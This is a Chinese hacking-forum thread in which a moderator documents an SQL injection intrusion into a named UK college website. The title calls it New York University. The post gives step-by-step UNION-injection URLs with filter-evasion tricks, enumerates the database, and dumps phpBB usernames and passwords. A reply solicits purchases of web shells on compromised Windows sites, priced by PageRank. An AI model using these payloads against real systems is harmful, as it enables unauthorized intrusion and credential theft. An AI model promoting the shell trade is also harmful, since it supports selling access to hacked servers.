论坛: 黑客进阶 标题: 哇考!入侵纽约大学过程 复制本贴地址    
作者: DarK-Z [bridex]    论坛用户   登录
过年了好忙 各种事情。
对待站我们应该耐心的去对待各种问题。包括以下出到的问题。
由于时间问题。作为版主拿出代表性的几点 希望为以后大家的技术有所帮助。

一 原理分析
我看看mysql5比之前增加的系统数据库information_schema的结构,它是用来存储数据库系统信息的
mysql> use information_schema;
Database changed
mysql> show tables;
+---------------------------------------+
| Tables_in_information_schema |
+---------------------------------------+
| CHARACTER_SETS |
| COLLATIONS |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS |
| COLUMN_PRIVILEGES |
| KEY_COLUMN_USAGE |
| ROUTINES |
| SCHEMATA |
| SCHEMA_PRIVILEGES |
| STATISTICS |
| TABLES |
| TABLE_CONSTRAINTS |
| TABLE_PRIVILEGES |
| TRIGGERS |
| USER_PRIVILEGES |
| VIEWS |
+---------------------------------------+
这里只挑注射中可以用到的几个表。 
| SCHEMATA �D�D>存储数据库名的,
|――>关键字段:SCHEMA_NAME,表示数据库名称
| TABLES �D�D>存储表名的
|――>关键字段:TABLE_SCHEMA表示表所属的数据库名称;
TABLE_NAME表示表的名称
| COLUMNS �D�D>存储字段名的
|――>关键字段:TABLE_SCHEMA表示表所属的数据库名称;
TABLE_NAME表示所属的表的名称
          COLUMN_NAME表示字段名
二 注入过程
1 版本号:1:版本号http://lrc.yorkcollege.ac.uk/subjects/display.php?id=64%20union%20select%201,2,3,4,unhex(hex(@@version)),6,7,8,9,10,11/*(这里用hex unhex绕过错误)

2用户名:2:用户名http://lrc.yorkcollege.ac.uk/subjects/display.php?id=64%20union%20select%201,2,3,4,unhex(hex(user())),6,7,8,9,10,11/*

3数据库名:11:数据库库名:http://lrc.yorkcollege.ac.uk/subjects/display.php?id=64%20union%20select%201,2,3,4,unhex(hex(SCHEMA_NAME)),6,7,8,9,10,11%20from%20information_schema.SCHEMATA%20where%20SCHEMA_NAME%20like%20char(37,105,108,116,95,112,104,112,98,98,37)/* 这里我们找下phpbb的表段。(关键模糊查询,有些库名是很多的。甚至上百,模糊查询可以帮你找到你所希望的。例如:%pass%  %phpbb%等有用的表)

4段名:4:段名http://lrc.yorkcollege.ac.uk/subjects/display.php?id=64%20union%20all%20select%201,2,3,4,unhex(hex(table_name)),6,7,8,9,10,11%20from%20information_schema.tables%20where%20table_schema=database()/*(这里直接利用查询=database查询与用户有关的段)

5:避免限制limit的:http://lrc.yorkcollege.ac.uk/subjects/display.php?id=64%20union%20all%20select%201,2,3,4,unhex(hex(table_name)),6,7,8,9,10,11%20from%20information_schema.tables%20where%20table_schema=database()%20and%20table_name%20!=%20char(117,115,101,114,115%20)/*(有些情况下limit是被限制的 之类我们可以采用!=来绕过)
6:username:http://lrc.yorkcollege.ac.uk/subjects/display.php?id=64%20union%20all%20select%201,2,3,4,unhex(hex(column_name)),6,7,8,9,10,11%20from%20information_schema.columns%20where%20table_name=char(117,115,101,114,115)%20limit%202,1/*
7:password:http://lrc.yorkcollege.ac.uk/subjects/display.php?id=64%20union%20all%20select%201,2,3,4,unhex(hex(column_name)),6,7,8,9,10,11%20from%20information_schema.columns%20where%20table_name=char(117,115,101,114,115)%20limit%206,1/*(由于长度问题 这里显示不出来 经试验此表并不重要)
8 容错的:http://lrc.yorkcollege.ac.uk/subjects/display.php?id=-1%20union%09select%091,2,3,4,username,6,7,8,9,10,11%09from%09users/*(大家注意这条语句  很多情况下如果我们id=64 是不行的  这里64可换为-1 两外%20换为%09 多多注意哦 )
9模糊查询:http://lrc.yorkcollege.ac.uk/subjects/display.php?id=64%20union%20all%20select%201,2,3,4,unhex(hex(table_name)),6,7,8,9,10,11%20from%20information_schema.tables%20where%20table_name%20like%20char(37,112,104,112,37)/*
10:结果:http://lrc.yorkcollege.ac.uk/subjects/display.php?id=64+union+select+1,2,3,4,unhex(hex(concat(username,0x3a,user_password))),6,7,8,9,10,11+from+ilt_phpbb.phpbb_users


时间关系 不再补充 关键字段已经爆出 。
用户密码也已经爆出。
关键在于大家对于MY SQL注入错误的一些对待问题。
希望此文可以帮助大家。



又是SQL,现在的SQL越来越不安全!


地主 发表时间: 11-05-19 20:40

回复: suncool [suncool]   论坛用户   登录
cool

B1层 发表时间: 12-03-18 17:07

回复: u123456 [u123456]   论坛用户   登录
厉害!cool~

B2层 发表时间: 13-02-01 18:17

回复: msm123 [msm123]   论坛用户   登录
长期寻能拿英文shell的黑客高手合作:
shell具体要求如下:
1,要支持ASP程序,
2,系统是windows操作系统,
3,PR值大于等于3,收录情况比较好
4,shell要稳定
5,支持上传文件到根目录
6,主页要有修改权限。

PR3=30 PR4=50 PR5=70 PR6=100

不懂的别加,具体价格我们再谈都可以!只要shell质量好!都可以商量!请尽快和我联系!谢谢 ,QQ:745733581


B3层 发表时间: 13-02-18 15:51

回复: tryalone [tryalone]   论坛用户   登录

                            巨资诚聘网络安全工程师
   1、负责公司核心业务及产品的安全测试、安全审核、安全风险评估与分析及加固;
  2、对产品代码进行审视,找出安全漏洞并提出修改建议;
  3、研究各种安全技术,编写和维护用于安全测试的攻击工具,防御工具和分析工具
  4、负责公司Web产品涉及到的安全性研究;
  5、负责响应公司的安全事件;
  6、为公司员工提供信息安全教育及培训。
  岗位要求:
  1、熟悉渗透测试的各类技术及方法,熟练掌握各种渗透测试工具;熟练操作各类操 

  作系统、应用平台;
  2、精通或熟练掌握php/perl/python/javascript/shell等多种脚本语言;
  3、熟悉asp、php、jsp等主流的Web安全技术,包括SQL注入、XSS、CSRF等常见的安 

  全漏洞利用;
  4、熟悉国内外主流安全产品、工具,如AppScan扫描器、wvs等;
  5、2年以上的web安全工作经验,对Web安全测试有自己的理解;
  6、熟悉常见攻击和防御办法,熟悉web安全和渗透技术,能自行进行web渗透测试, 

  恶意代码监测和分析;
  7、熟悉ddos攻击类型和原理有一定的ddos攻防经验,能有效防御黑客挂马和恶意流 

  量攻击,会熟练搭建负载均衡系统。
  8、热爱安全技术,乐于沟通,有良好的团队精神,实际动手能力强。
  招聘类别: 全职/兼职
  年龄要求:23岁-40岁
  性别要求:不限
  待遇:月薪不低于10万
    联系电话:13600972693 陈先生
  联系QQ:1730576661Sample Text

B4层 发表时间: 13-02-28 11:29

回复: anybaby [anybaby]   论坛用户   登录
sql万岁

B5层 发表时间: 13-03-17 05:14

回复: zhui1 [zhui1]   论坛用户   登录
看到好几次因为SQL注入的问题被侵入的了,这似乎是web中最长见的问题之一了吧,以后web开发却是要注意这一块了

B6层 发表时间: 16-05-31 02:51

回复: manbuzhe [manbuzhe]   论坛用户   登录
有个项目每月付费,有兴趣请联系huahouerhao@163.com

B7层 发表时间: 16-07-03 16:45

论坛: 黑客进阶

20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon

粤ICP备05087286号